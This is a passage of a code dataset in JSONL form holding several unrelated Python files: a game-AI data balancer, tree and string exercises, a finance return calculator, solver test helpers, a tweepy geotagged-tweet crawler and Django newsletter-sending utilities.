len(w)\r\nfor i in [a, w, s, d, wa, wd, sa, sd, nok]:\r\n shuffle(i)\r\n if minLen > len(i):\r\n minLen = len(i)\r\n \r\na = a[:minLen]\r\nw = w[:minLen]\r\ns = s[:minLen]\r\nd = d[:minLen]\r\nwa = wa[:minLen]\r\nwd = wd[:minLen]\r\nsa = sa[:minLen]\r\nsd = sd[:minLen]\r\nnok = nok[:minLen]\r\n\r\nprint(f'A: {len(a)}\\nW: {len(w)}\\nS: {len(s)}\\nD: {len(d)}\\nWA: {len(wa)}\\nWD: {len(wd)}\\nSA: {len(sa)}\\nSD: {len(sd)}\\nNoKey: {len(nok)}')\r\n\r\nprint('Starting count: ',total)\r\nfinal_data = a + w + s + d + wa + wd + sa + sd + nok\r\nshuffle(final_data)\r\nprint('Balanced data: ', len(final_data))\r\n\r\nc = 'ALL'\r\nnp.save(f'balanced_data_for_training_{c}.npy', final_data)\r\n","sub_path":"gtav/balancing training data -BIGGER MODEL - Copy.py","file_name":"balancing training data -BIGGER MODEL - Copy.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"59725644","text":"from lib.graph import TreeNode\n\n\ndef get_order_list(node, lst):\n if node is None:\n lst.append(\"None\")\n return\n\n lst.append(node.data)\n get_order_list(node.left, lst)\n get_order_list(node.right, lst)\n\n\ndef contains_tree(n1, n2):\n l1 = []\n l2 = []\n\n get_order_list(n1, l1)\n get_order_list(n2, l2)\n\n return ''.join([str(i) for i in l2]) in ''.join([str(i) for i in l1])\n\n\nif __name__ == '__main__':\n root1 = TreeNode(1)\n root1.left = TreeNode(2)\n root1.right = TreeNode(3)\n root1.left.left = TreeNode(4)\n\n root2 = TreeNode(2)\n root2.left = TreeNode(4)\n\n print(contains_tree(root1, root2))\n","sub_path":"chapter_4/10_check_subtree/pre_order.py","file_name":"pre_order.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"66520109","text":"class Pound:\n value = 1.00\n colour = \"gold\"\n num_edges = 1\n diameter = 22.5 #mm\n thickness = 3.15 #mm\n heads = True\n\ncoin1 = Pound()\nprint(type(coin1))\n\nprint(coin1.value)\ncoin1.colour = \"greenish\"\nprint(coin1.colour)\ncoin2 = Pound()\nprint(coin2.colour)\ncoin1.value = 1.25\nprint(coin1.value)\nprint(coin2.value)\n\n","sub_path":"src/python_tutorial/tutorial_27.py","file_name":"tutorial_27.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"406182416","text":"# © Copyright, Fervent | All Rights Reserved\n\"\"\"\n# =====================================================\n# EXPECTED RETURNS USING MEAN - APPLIED\n# =====================================================\n\n# -----------\n# Beginner?\n# -----------\nWe STRONGLY recommend using the .ipynb version instead of this .py version\nThe .ipynb has more explanatory notes to help and guide you through.\n\nThe .py version is largely designed for more intermediate / advanced users of\nPython.\n\"\"\"\n# Import package dependencies\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set()\n\ndf = pd.read_csv(\"../data/fb_price.csv\") # Read in fb price data as a pandas dataframe\ndf = df[['Date', 'Adj Close']] # Extract relevant columns\n\ndf.rename(columns={'Date' : 'date', 'Adj Close' : 'price_t'},\n inplace=True) # Rename columns to better match PEP8 standards\n\ndf['returns'] = df['price_t'].pct_change(1) # Calculate returns\n\n# Calculate the mean based Expected Return\n# Create a new column for the Expected Return on Facebook\ndf['expected_return_fb'] = df['returns'].mean()\n\n# Set the date column as the index to ensure we have dates in the plot.\ndf.set_index('date', inplace=True)\n\n# Plot the Returns and Expected Return of Facebook\ndf[['returns', 'expected_return_fb']].plot(figsize=(12, 8))\n\n# Estimate a 30 Day Moving Average (\"MA\") Expected Return\ndf['expected_return_ma_30d'] = df['returns'].rolling(30).mean()\n\n# Estimate a 7 Day Moving Average (\"MA\") Expected Return\n# Note that the first 6 observations for expected_return_ma_30d will be NaN\n# This is because we're estimating a 7 Day Rolling Mean.\n# Naturally, the first 6 won't have any mean!\ndf['expected_return_ma_7d'] = df['returns'].rolling(7).mean()\n\n# Plot all the time series\ndf[['returns', 'expected_return_fb',\n 'expected_return_ma_30d', 'expected_return_ma_7d']].plot(figsize=(12, 8))\n\n# ============================\n# BONUS: BETTER PLOTTING\n# ============================\ndf[['returns', 'expected_return_fb', 'expected_return_ma_30d']].plot(\n figsize=(12, 8), color=('#39b8eb', '#ffbd4a', '#7a7878'),\n title='Static Mean vs. 30 Day Moving Average')\n\ndf[['returns', 'expected_return_fb',\n 'expected_return_ma_30d', 'expected_return_ma_7d']].plot(\n figsize=(12, 8), color=('#39b8eb', '#ffbd4a', '#121111', '#7a7878'),\n title='Mean vs. Moving Averages')\n","sub_path":"finance/expected_return_mean.py","file_name":"expected_return_mean.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"558995945","text":"\"\"\"\nName: Test_CommonRoutines.py\nAuthor: Sid Bishnu\nDetails: As the name implies, this script tests the various functions of \n../../src/DGSEM_Rotating_Shallow_Water/CommonRoutines.py.\n\"\"\"\n\n\nimport numpy as np\nimport os\nimport sys\nsys.path.append(os.path.realpath('../..') + '/src/DGSEM_Rotating_Shallow_Water/')\nfrom IPython.utils import io\nwith io.capture_output() as captured:\n import CommonRoutines as CR\n\n\ndef TestRoundArray():\n x = np.array([-1.75,1.75,-2.25,2.25])\n xRounded = CR.RoundArray(x)\n print('The array x is')\n print(x)\n print('After rounding, the array x becomes')\n print(xRounded)\n\n\ndo_TestRoundArray = False\nif do_TestRoundArray:\n TestRoundArray()\n\n\ndef TestPythonPlot1DSaveAsPDF():\n x = np.arange(0.0,10.0,1.0) # Syntax is x = np.arange(First Point, Last Point, Interval).\n y = np.arange(0.0,20.0,2.0)\n output_directory = '../../output/DGSEM_Rotating_Shallow_Water_Output/'\n CR.PythonPlot1DSaveAsPDF(output_directory,'regular',x,y,2.0,'-','k',True,'s',7.5,['x','y'],[17.5,17.5],[10.0,10.0],\n [15.0,15.0],'Python Plot 1D',20.0,True,'PythonPlot1D',False)\n\n\ndo_TestPythonPlot1DSaveAsPDF = False\nif do_TestPythonPlot1DSaveAsPDF:\n TestPythonPlot1DSaveAsPDF()\n \n \ndef TestPythonPlots1DSaveAsPDF():\n x = np.arange(0.0,10.0,1) # Syntax is x = np.arange(First Point, Last Point, Interval).\n y1 = np.arange(0.0,20.0,2)\n y2 = np.arange(0.0,40.0,4)\n yAll = np.zeros((2,len(x)))\n yAll[0,:] = y1\n yAll[1,:] = y2\n output_directory = '../../output/DGSEM_Rotating_Shallow_Water_Output/'\n CR.PythonPlots1DSaveAsPDF(output_directory,'regular',x,yAll,[2.0,2.0],['-','--'],['r','b'],[True,True],['s','D'],\n [10.0,10.0],['x','y'],[17.5,17.5],[10.0,10.0],[15.0,15.0],['y1','y2'],17.5,'center left',\n 'Python Plots 1D',20.0,True,'PythonPlots1D',False)\n \n \ndo_TestPythonPlots1DSaveAsPDF = False\nif do_TestPythonPlots1DSaveAsPDF:\n TestPythonPlots1DSaveAsPDF()\n \n \ndef TestPythonConvergencePlot1DSaveAsPDF():\n x = np.arange(0.0,10.0,1) # Syntax is x = np.arange(First Point, Last Point, Interval)\n y1 = np.arange(0.0,20.0,2)\n y2 = np.arange(0.0,20.0,2)\n output_directory = '../../output/DGSEM_Rotating_Shallow_Water_Output/'\n CR.PythonConvergencePlot1DSaveAsPDF(output_directory,'regular',x,y1,y2,[2.0,2.0],['-',' '],['k','k'],[False,True],\n ['s','s'],[10.0,10.0],['x','y'],[17.5,17.5],[10.0,10.0],[15.0,15.0],['y1','y2'],\n 17.5,'upper left','Convergence Plot 1D',20.0,True,'ConvergencePlot1D',False,\n drawMajorGrid=True,legendWithinBox=True)\n\n\ndo_TestPythonConvergencePlot1DSaveAsPDF = False\nif do_TestPythonConvergencePlot1DSaveAsPDF:\n TestPythonConvergencePlot1DSaveAsPDF()\n \n\ndef TestWriteTecPlot2DStructured():\n xLeft = 0.0\n xRight = 60.0\n nX = 60\n x = np.linspace(xLeft,xRight,nX+1) \n xCenter = x[int(nX/2)]\n yBottom = 0.0\n yTop = 50.0\n nY = 50\n y = np.linspace(yBottom,yTop,nY+1)\n yCenter = y[int(nY/2)]\n phi = np.zeros((nX+1,nY+1))\n for iY in range(0,nY+1):\n for iX in range(0,nX+1):\n phi[iX,iY] = (x[iX]-xCenter)**2.0 + (y[iY]-yCenter)**2.0\n output_directory = '../../output/DGSEM_Rotating_Shallow_Water_Output/'\n filename = 'TestWriteTecPlot2DStructured'\n CR.WriteTecPlot2DStructured(output_directory,x,y,phi,filename)\n \n \ndo_TestWriteTecPlot2DStructured = False\nif do_TestWriteTecPlot2DStructured: \n TestWriteTecPlot2DStructured()\n \n \ndef TestWriteTecPlot2DUnstructured():\n xLeft = 0.0\n xRight = 60.0\n nX = 60\n x = np.linspace(xLeft,xRight,nX+1) \n xCenter = x[int(nX/2)]\n yBottom = 0.0\n yTop = 50.0\n nY 
= 50\n y = np.linspace(yBottom,yTop,nY+1)\n yCenter = y[int(nY/2)]\n xUnstructured = np.zeros((nX+1)*(nY+1))\n yUnstructured = np.zeros((nX+1)*(nY+1))\n phiUnstructured = np.zeros((nX+1)*(nY+1))\n for iY in range(0,nY+1):\n for iX in range(0,nX+1):\n i = iY*(nX+1) + iX\n xUnstructured[i] = x[iX]\n yUnstructured[i] = y[iY]\n phiUnstructured[i] = (xUnstructured[i]-xCenter)**2.0 + (yUnstructured[i]-yCenter)**2.0\n output_directory = '../../output/DGSEM_Rotating_Shallow_Water_Output/'\n filename = 'TestWriteTecPlot2DUnstructured'\n CR.WriteTecPlot2DUnstructured(output_directory,xUnstructured,yUnstructured,phiUnstructured,filename)\n \n \ndo_TestWriteTecPlot2DUnstructured = False\nif do_TestWriteTecPlot2DUnstructured: \n TestWriteTecPlot2DUnstructured()\n \n \ndef TestReadTecPlot2DStructured():\n x = np.array([1,2,3],dtype=int) \n y = x\n nX = len(x) - 1\n nY = len(y) - 1\n phi = np.zeros((nX+1,nY+1))\n print('Writing structured array to file:\\niX iY x y phi')\n for iY in range(0,nY+1):\n for iX in range(0,nX+1):\n phi[iX,iY] = (x[iX])**2.0 + (y[iY])**2.0\n print('%1d %1d %1d %1d %2.2d' %(iX,iY,x[iX],y[iY],phi[iX,iY]))\n output_directory = '../../output/DGSEM_Rotating_Shallow_Water_Output/'\n filename = 'TestReadTecPlot2DStructured'\n CR.WriteTecPlot2DStructured(output_directory,x,y,phi,filename)\n filename += '.tec'\n x, y, phi = CR.ReadTecPlot2DStructured(output_directory,filename,ReturnIndependentVariables=True)\n print('\\nReading structured array from file:\\niX iY x y phi')\n for iY in range(0,nY+1):\n for iX in range(0,nX+1):\n print('%1d %1d %1d %1d %2.2d' %(iX,iY,x[iX],y[iY],phi[iX,iY]))\n \n \ndo_TestReadTecPlot2DStructured = False\nif do_TestReadTecPlot2DStructured: \n TestReadTecPlot2DStructured()\n \n \ndef TestReadTecPlot2DUnstructured():\n x = np.array([1,2,3],dtype=int) \n y = x\n nX = len(x) - 1\n nY = len(y) - 1\n xUnstructured = np.zeros((nX+1)*(nY+1))\n yUnstructured = np.zeros((nX+1)*(nY+1))\n phiUnstructured = np.zeros((nX+1)*(nY+1))\n print('Writing unstructured array to file:\\ni x y phi')\n for iY in range(0,nY+1):\n for iX in range(0,nX+1):\n i = iY*(nX+1) + iX\n xUnstructured[i] = x[iX]\n yUnstructured[i] = y[iY]\n phiUnstructured[i] = (xUnstructured[i])**2.0 + (yUnstructured[i])**2.0\n print('%1d %1d %1d %2.2d' %(i,xUnstructured[i],yUnstructured[i],phiUnstructured[i]))\n output_directory = '../../output/DGSEM_Rotating_Shallow_Water_Output/'\n filename = 'TestReadTecPlot2DUnstructured'\n CR.WriteTecPlot2DUnstructured(output_directory,xUnstructured,yUnstructured,phiUnstructured,filename)\n filename += '.tec'\n xUnstructured, yUnstructured, phiUnstructured = (\n CR.ReadTecPlot2DUnstructured(output_directory,filename,ReturnIndependentVariables=True))\n print('\\nReading structured array from file:\\ni x y phi')\n for i in range(0,(nX+1)*(nY+1)):\n print('%1d %1d %1d %2.2d' %(i,xUnstructured[i],yUnstructured[i],phiUnstructured[i]))\n \n \ndo_TestReadTecPlot2DUnstructured = False\nif do_TestReadTecPlot2DUnstructured: \n TestReadTecPlot2DUnstructured()\n \n \ndef TestPythonReadFileAndMakeFilledContourPlot2D():\n output_directory = '../../output/DGSEM_Rotating_Shallow_Water_Output/'\n filenameStructured = 'TestWriteTecPlot2DStructured.tec'\n filenameUnstructured = 'TestWriteTecPlot2DUnstructured.tec'\n nContours = 300\n labels = ['x','y']\n labelfontsizes = [17.5,17.5]\n labelpads = [10.0,10.0]\n tickfontsizes = [15.0,15.0]\n useGivenColorBarLimits = False\n ColorBarLimits = [0.0,0.0]\n nColorBarTicks = 6\n title = 'Two-Dimensional Gaussian Function'\n titlefontsize = 
22.5\n SaveAsPDF = True\n Show = False\n CR.PythonReadFileAndMakeFilledContourPlot2D(output_directory,filenameStructured,nContours,labels,labelfontsizes,\n labelpads,tickfontsizes,useGivenColorBarLimits,ColorBarLimits,\n nColorBarTicks,title,titlefontsize,SaveAsPDF,Show,DataType='Structured')\n CR.PythonReadFileAndMakeFilledContourPlot2D(output_directory,filenameUnstructured,nContours,labels,labelfontsizes,\n labelpads,tickfontsizes,useGivenColorBarLimits,ColorBarLimits,\n nColorBarTicks,title,titlefontsize,SaveAsPDF,Show,\n DataType='Unstructured')\n \n \ndo_TestPythonReadFileAndMakeFilledContourPlot2D = False\nif do_TestPythonReadFileAndMakeFilledContourPlot2D: \n TestPythonReadFileAndMakeFilledContourPlot2D()\n\n\ndef Test_WriteStateVariableLimitsToFile_ReadStateVariableLimitsFromFile():\n StateVariableLimits = np.zeros(2)\n StateVariableLimits[0] = np.exp(1.0)\n StateVariableLimits[1] = np.pi\n output_directory = '../../output/DGSEM_Rotating_Shallow_Water_Output/'\n filename = 'StateVariableLimits'\n CR.WriteStateVariableLimitsToFile(output_directory,StateVariableLimits,filename)\n print('The state variable limits written to file are: [%.15f %.15f].' \n %(StateVariableLimits[0],StateVariableLimits[1]))\n filename += '.curve'\n StateVariableLimits = CR.ReadStateVariableLimitsFromFile(output_directory,filename)\n print('The state variable limits read from file are: [%.15f %.15f].' \n %(StateVariableLimits[0],StateVariableLimits[1]))\n \n \ndo_Test_WriteStateVariableLimitsToFile_ReadStateVariableLimitsFromFile = False\nif do_Test_WriteStateVariableLimitsToFile_ReadStateVariableLimitsFromFile: \n Test_WriteStateVariableLimitsToFile_ReadStateVariableLimitsFromFile()","sub_path":"tests/DGSEM_Rotating_Shallow_Water_Tests/Test_CommonRoutines.py","file_name":"Test_CommonRoutines.py","file_ext":"py","file_size_in_byte":9653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
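The test file above exercises a write/read round trip for TecPlot-style structured files through the CommonRoutines module, which is not shown here. Below is a minimal sketch of what such a writer/reader pair might look like, assuming a plain ASCII POINT layout (one `x y phi` row per node, y-major order); the function names mirror the CR interface but the exact file format is an assumption:

```python
import numpy as np

def write_tecplot_2d_structured(path, x, y, phi):
    # Write a minimal TecPlot ASCII file in POINT format:
    # one "x y phi" row per grid node, y-major ordering (assumed layout).
    nX, nY = len(x) - 1, len(y) - 1
    with open(path, 'w') as f:
        f.write('VARIABLES = "X", "Y", "PHI"\n')
        f.write('ZONE I=%d, J=%d, F=POINT\n' % (nX + 1, nY + 1))
        for iY in range(nY + 1):
            for iX in range(nX + 1):
                f.write('%.15g %.15g %.15g\n' % (x[iX], y[iY], phi[iX, iY]))

def read_tecplot_2d_structured(path):
    # Skip the two header lines and rebuild the structured arrays.
    data = np.loadtxt(path, skiprows=2)
    x = np.unique(data[:, 0])
    y = np.unique(data[:, 1])
    phi = data[:, 2].reshape(len(y), len(x)).T  # back to [iX, iY]
    return x, y, phi

x = np.linspace(0.0, 60.0, 61)
y = np.linspace(0.0, 50.0, 51)
phi = (x[:, None] - x[30])**2 + (y[None, :] - y[25])**2
write_tecplot_2d_structured('demo.tec', x, y, phi)
x2, y2, phi2 = read_tecplot_2d_structured('demo.tec')
assert np.allclose(phi, phi2)
```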
+{"seq_id":"288138277","text":"import unittest\n\nimport sys\nclass Solution(unittest.TestCase):\n #my bad, and the problem is the speed not taken care of well\n def longestWord_TLE_ming(self, words):\n \"\"\"\n :type words: List[str]\n :rtype: str\n \"\"\"\n mx = -sys.maxsize\n res = None\n for word in words:\n print('word: %s ' % word)\n size = len(word)\n temp = str(word)\n buildable = True\n while len(temp) > 0:\n temp = temp[:-1]\n print('temp: %s ' % temp)\n if temp != '' and temp not in words:\n buildable = False\n break\n if buildable and size > mx:\n mx = max(mx, size)\n res = word\n return res\n\n #the trick is sorting\n def longestWord(self, words):\n valids = {''}\n for word in sorted(words):\n if word[:-1] in valids:\n valids.add(word)\n return max(sorted(valids), key=len)\n \n \n\n def test_longestWord(self):\n words = [\"w\",\"wo\",\"wor\",\"worl\", \"world\"]\n res = self.longestWord(words)\n print('res: %s ' % res)\n self.assertTrue(res == 'world')\n\n words = [\"a\", \"banana\", \"app\", \"appl\", \"ap\", \"apply\", \"apple\"]\n res = self.longestWord(words)\n print('res: %s ' % res)\n self.assertTrue(res == 'apple') #not apply\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"Python/longestWord.py","file_name":"longestWord.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"542174877","text":"\"\"\"\nUse Twitter search APIs find tweets from specific location.\nRaw tweets are stored in specified couchDB databse.\nThis twitter searcher prevents the duplicate dataset return by the API server by using the upper bound and lower bound parameter.\n\"\"\"\n\nimport logging\nimport tweepy\nimport couchdb\n\nclass TwitterSearcher():\n \"\"\"Use Twitter search APIs find tweets from specific location.\"\"\"\n\n def __init__(self, api, db, geo, query):\n \"\"\"Set variables required by Twitter Search API.\"\"\"\n self.api = api\n self.db = db\n self.geo = geo\n self.query = query\n self.limit = 100\n\n def search(self):\n \"\"\"Search for tweets via Twitter Search API.\n Since id of each tweet is decreasing in every return dataset and the created time is also decreasing. The first line of the\n return dataset will be the newest created twitter while the last line will be the oldest one in this return dataset.\n \"\"\"\n # default no lower bound.\n lower_id = None\n # default no upper bound.\n upper_id = -1\n\n # Track number of tweets returned in total.\n tweet_count = 0\n count = 0\n\n # Pull tweets until error or no more to process.\n while True:\n try:\n # if there is no upper bounder\n if (upper_id <= 0):\n # if there is no lower bound\n if (not lower_id):\n new_tweets = self.api.search(\n q=self.query,\n geocode=self.geo,\n count=self.limit\n )\n # if there is lower bound\n else:\n new_tweets = self.api.search(\n q=self.query,\n geocode=self.geo,\n count=self.limit,\n since_id=lower_id\n )\n else:\n # if there is no lower bound\n if (not lower_id):\n new_tweets = self.api.search(\n q=self.query,\n geocode=self.geo,\n count=self.limit,\n max_id=str(upper_id - 1)\n )\n # if there is lower bounder.\n else:\n new_tweets = self.api.search(\n q=self.query,\n geocode=self.geo,\n count=self.limit,\n max_id=str(upper_id - 1),\n since_id=lower_id\n )\n\n # Exit when no new tweets are found.\n if not new_tweets:\n logging.info(\"No more tweets to read.\")\n break\n\n # Process received tweets.\n for tweet in new_tweets:\n jtweet = tweet._json\n if tweet.coordinates or tweet.place:\n # store tweets with geo code.\n jtweet['_id'] = jtweet['id_str']\n try:\n self.db.save(jtweet)\n except couchdb.http.ResourceConflict:\n logging.info(\"Ignored duplicate tweet.\")\n\n # Output current number of tweets.\n tweet_count += len(new_tweets)\n logging.info(\"Downloaded {0} tweets\".format(tweet_count))\n\n # Track upper id. Use the id of last tweet in the previous return result as the new upper_id.\n upper_id = new_tweets[-1].id\n # Exit upon error.\n except tweepy.TweepError as e:\n logging.error(str(e))\n break","sub_path":"3_crawler/old/crawlerSearch.py","file_name":"crawlerSearch.py","file_ext":"py","file_size_in_byte":3887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"540498636","text":"# -*- coding: utf-8 -*-\r\n\"\"\"utilities\"\"\"\r\n\r\nfrom datetime import datetime\r\nimport re\r\nimport sys\r\n\r\nfrom django.conf import settings\r\nfrom django.core.mail import get_connection, EmailMultiAlternatives\r\nfrom django.template.loader import get_template\r\nfrom django.utils import translation\r\nfrom django.utils.translation import get_language as django_get_language\r\nfrom django.urls import reverse\r\n\r\nfrom ...logger import logger\r\nfrom ...models import Newsletter\r\nfrom ...settings import get_newsletter_context_callbacks\r\nfrom ...utils import dehtml, make_links_absolute\r\n\r\nfrom .models import Emailing, MagicLink, Contact\r\n\r\n\r\nclass EmailSendError(Exception):\r\n \"\"\"An exception raise when sending email failed\"\"\"\r\n pass\r\n\r\n\r\ndef format_context(text, data):\r\n \"\"\"replace custom templating by something compliant with python format function\"\"\"\r\n\r\n # { and } need to be escaped for the format function\r\n text = text.replace('{', '{{').replace('}', '}}')\r\n\r\n # #!- and -!# are turned into { and }\r\n text = text.replace('#!-', '{').replace('-!#', '}')\r\n\r\n return text.format(**data)\r\n\r\n\r\ndef get_emailing_context(emailing, contact):\r\n \"\"\"get context for emailing: user,....\"\"\"\r\n data = dict(contact.__dict__)\r\n for field in ('fullname', ):\r\n data[field] = getattr(contact, field)\r\n \r\n # clone the object: Avoid overwriting {tags} for ever\r\n newsletter = Newsletter()\r\n newsletter.__dict__ = dict(emailing.newsletter.__dict__)\r\n\r\n newsletter.subject = format_context(newsletter.subject, data)\r\n\r\n html_content = format_context(newsletter.content, data)\r\n\r\n unregister_url = newsletter.get_site_prefix() + reverse('newsletters:unregister', args=[emailing.id, contact.uuid])\r\n \r\n newsletter.content = html_content\r\n\r\n context_dict = {\r\n 'title': dehtml(newsletter.subject).replace('\\n', ''),\r\n 'newsletter': newsletter,\r\n 'by_email': True,\r\n 'MEDIA_URL': settings.MEDIA_URL,\r\n 'STATIC_URL': settings.STATIC_URL,\r\n 'SITE_PREFIX': emailing.get_domain_url_prefix(),\r\n 'subscription_type_name': emailing.subscription_type.name,\r\n 'unregister_url': unregister_url,\r\n 'contact': contact,\r\n 'emailing': emailing,\r\n }\r\n \r\n for callback in get_newsletter_context_callbacks():\r\n dictionary = callback(newsletter)\r\n if dictionary:\r\n context_dict.update(dictionary)\r\n \r\n return context_dict\r\n\r\n\r\ndef patch_emailing_html(html_text, emailing, contact):\r\n \"\"\"transform links into magic link\"\"\"\r\n links = re.findall('href=\"(?P.+?)\"', html_text)\r\n\r\n ignore_links = [\r\n reverse(\"newsletters:unregister\", args=[emailing.id, contact.uuid]),\r\n reverse(\"newsletters:view_online\", args=[emailing.id, contact.uuid]),\r\n ]\r\n\r\n for lang_tuple in settings.LANGUAGES:\r\n lang = lang_tuple[0][:2]\r\n ignore_links.append(\r\n reverse(\"newsletters:view_online_lang\", args=[emailing.id, contact.uuid, lang])\r\n )\r\n\r\n for link in links:\r\n if (not link.lower().startswith('mailto:')) and (link[0] != \"#\") and link not in ignore_links:\r\n # mailto, internal links, 'unregister' and 'view online' are not magic\r\n if len(link) < 500:\r\n\r\n magic_links = MagicLink.objects.filter(emailing=emailing, url=link)\r\n if magic_links.count() == 0:\r\n magic_link = MagicLink.objects.create(emailing=emailing, url=link)\r\n else:\r\n magic_link = magic_links[0]\r\n\r\n view_magic_link_url = reverse('newsletters:view_link', args=[magic_link.uuid, 
contact.uuid])\r\n magic_url = emailing.newsletter.get_site_prefix() + view_magic_link_url\r\n html_text = html_text.replace('href=\"{0}\"'.format(link), 'href=\"{0}\"'.format(magic_url))\r\n else:\r\n if 'test' not in sys.argv:\r\n logger.warning(\r\n \"magic link size is greater than 500 ({0}) : {1}\".format(len(link), link)\r\n )\r\n return html_text\r\n\r\n\r\ndef send_newsletter(emailing, max_nb):\r\n \"\"\"send newsletter\"\"\"\r\n\r\n # Clean the urls\r\n emailing.newsletter.content = make_links_absolute(\r\n emailing.newsletter.content, emailing.newsletter, site_prefix=emailing.get_domain_url_prefix()\r\n )\r\n \r\n connection = get_connection()\r\n from_email = emailing.subscription_type.from_email or settings.COOP_CMS_FROM_EMAIL\r\n emails = []\r\n \r\n contacts = list(emailing.send_to.all()[:max_nb])\r\n for contact in contacts:\r\n \r\n if contact.email:\r\n lang = emailing.lang or contact.favorite_language or settings.LANGUAGE_CODE[:2]\r\n translation.activate(lang)\r\n\r\n emailing_context = get_emailing_context(emailing, contact)\r\n emailing_context[\"LANGUAGE_CODE\"] = lang\r\n context = emailing_context\r\n the_template = get_template(emailing.newsletter.get_template_name())\r\n\r\n html_text = the_template.render(context)\r\n\r\n html_text = patch_emailing_html(html_text, emailing, contact)\r\n\r\n html_text = make_links_absolute(\r\n html_text, emailing.newsletter, site_prefix=emailing.get_domain_url_prefix()\r\n )\r\n \r\n text = dehtml(html_text)\r\n list_unsubscribe_url = emailing.get_domain_url_prefix() + reverse(\r\n \"newsletters:unregister\", args=[emailing.id, contact.uuid]\r\n )\r\n list_unsubscribe_email = getattr(settings, 'COOP_CMS_REPLY_TO', '') or from_email\r\n headers = {\r\n \"List-Unsubscribe\": \"<{0}>, <mailto:{1}>\".format(\r\n list_unsubscribe_url, list_unsubscribe_email\r\n )\r\n }\r\n\r\n if getattr(settings, 'COOP_CMS_REPLY_TO', None):\r\n headers['Reply-To'] = settings.COOP_CMS_REPLY_TO\r\n\r\n email = EmailMultiAlternatives(\r\n context['title'],\r\n force_line_max_length(text),\r\n from_email,\r\n [contact.email],\r\n headers=headers\r\n )\r\n html_text = force_line_max_length(html_text, max_length_per_line=400, dont_cut_in_quotes=True)\r\n email.attach_alternative(html_text, \"text/html\")\r\n emails.append(email)\r\n\r\n # print contact, \"processed\"\r\n emailing.send_to.remove(contact)\r\n emailing.sent_to.add(contact)\r\n \r\n emailing.save()\r\n nb_sent = connection.send_messages(emails)\r\n return nb_sent or 0\r\n\r\n\r\ndef on_bounce(event_type, email, description, permanent, contact_uuid, emailing_id):\r\n \"\"\"can be called to signal soft or hard bounce\"\"\"\r\n contacts = Contact.objects.filter(email=email)\r\n\r\n # Unsubscribe emails for permanent errors\r\n if permanent:\r\n all_contacts = list(contacts)\r\n\r\n for contact in all_contacts:\r\n for subscription in contact.subscription_set.all():\r\n subscription.accept_subscription = False\r\n subscription.unsubscription_date = datetime.now()\r\n subscription.save()\r\n\r\n # Update emailing statistics\r\n if contact_uuid and emailing_id:\r\n try:\r\n contact = Contact.objects.get(uuid=contact_uuid)\r\n except Contact.DoesNotExist:\r\n contact = None\r\n\r\n try:\r\n emailing = Emailing.objects.get(id=emailing_id)\r\n except Emailing.DoesNotExist:\r\n emailing = None\r\n\r\n if contact and emailing and hasattr(emailing, event_type):\r\n getattr(emailing, event_type).add(contact)\r\n emailing.save()\r\n\r\n\r\ndef get_language():\r\n \"\"\"wrap the django get_language and make sure: we 
return 2 chars\"\"\"\r\n lang = django_get_language()\r\n return lang[:2]\r\n\r\n\r\ndef force_line_max_length(text, max_length_per_line=400, dont_cut_in_quotes=True):\r\n \"\"\"returns same text with end of lines inserted if lien length is greater than 400 chars\"\"\"\r\n out_text = \"\"\r\n for line in text.split(\"\\n\"):\r\n\r\n if len(line) < max_length_per_line:\r\n out_text += line + \"\\n\"\r\n else:\r\n words = []\r\n line_length = 0\r\n quotes_count = 0\r\n for word in line.split(\" \"):\r\n if word:\r\n words.append(word)\r\n quotes_count += word.count('\"')\r\n line_length += len(word) + 1\r\n in_quotes = (quotes_count % 2) == 1 # If there are not an even number we may be inside a \"\"\r\n if line_length > max_length_per_line:\r\n if not (not dont_cut_in_quotes and in_quotes):\r\n # Line is more than allowed length for a line. Enter a end line character\r\n out_line = \" \".join(words)\r\n out_text += out_line + \"\\n\"\r\n words = []\r\n line_length = 0\r\n if words:\r\n out_line = \" \".join(words)\r\n out_text += out_line + \"\\n\"\r\n\r\n return out_text[:-1] # Remove the last \"\\n\"\r\n","sub_path":"coop_cms/apps/newsletters/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"497704386","text":"mot_codé = input(str('Entrer un mot codé : '))\nmot_clear = ''\np = 97\ncompteur = 0\ndict_test = {'à':'a' , 'é':'e', 'è':'e', 'ê':'e', 'ë':'e', 'ô':'o', 'î':'i', 'ï':'i'}\nliste_ok = ['à','é','è','ê','ë','ô','î','ï']\n\n# CLEAN\n\nfor f in range (0,len(mot_codé)):\n\n for k in range (0,len(liste_ok)):\n\n if mot_codé[f] == liste_ok[k]:\n mot_clear = mot_clear + dict_test[liste_ok[k]]\n \n \n\nprint (mot_clear)\n","sub_path":"test lettre.py","file_name":"test lettre.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
